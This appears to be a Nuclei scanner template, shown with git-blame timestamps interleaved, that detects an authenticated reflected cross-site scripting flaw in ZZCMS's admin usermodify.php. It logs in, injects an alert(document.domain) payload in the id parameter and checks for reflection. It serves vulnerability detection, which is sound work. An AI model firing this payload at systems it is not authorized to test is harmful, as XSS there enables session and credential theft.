2022-04-16 09:02:25 +00:00
id : zzcms-xss
info :
2022-07-24 15:46:05 +00:00
name : ZZCMS - Cross-Site Scripting
2022-04-16 09:02:25 +00:00
author : ritikchaddha
2022-09-23 17:53:08 +00:00
severity : high
description : ZZCMS contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
2022-04-16 09:02:25 +00:00
reference :
- https://github.com/JcQSteven/blog/issues/20
2022-09-23 17:53:08 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
2022-07-24 13:43:49 +00:00
metadata :
verified : true
2023-10-14 11:27:55 +00:00
max-request : 2
2022-07-24 13:43:49 +00:00
tags : zzcms,xss,authenticated
2022-04-16 09:02:25 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-07-24 13:43:49 +00:00
- raw :
- |
POST /admin/logincheck.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2022-04-16 09:02:25 +00:00
2022-07-24 13:43:49 +00:00
admin={{username}}&pass={{password}}
- |
GET /admin/usermodify.php?id=1%22%2balert(document.domain)%2b%22 HTTP/1.1
Host : {{Hostname}}
2022-04-16 09:02:25 +00:00
2022-07-24 13:43:49 +00:00
cookie-reuse : true
req-condition : true
matchers :
- type : dsl
dsl :
2023-06-19 21:10:30 +00:00
- "contains(header_2, 'text/html')"
2022-07-24 13:43:49 +00:00
- "status_code_2 == 200"
- 'contains(body_2, "参数 1\"+alert(document.domain)+")'
condition : and
2023-10-20 11:41:13 +00:00
# digest: 4a0a00473045022033d5fb5cd0377b448c3c0464415e81e47b60e586fc4c10a2e99fd155a9558ff3022100b68575dac3b63379244da43d2da6f2a1565bbd9c50c9ab42671d0b6142532a42:922c64590222798bb761d5b6d8e72950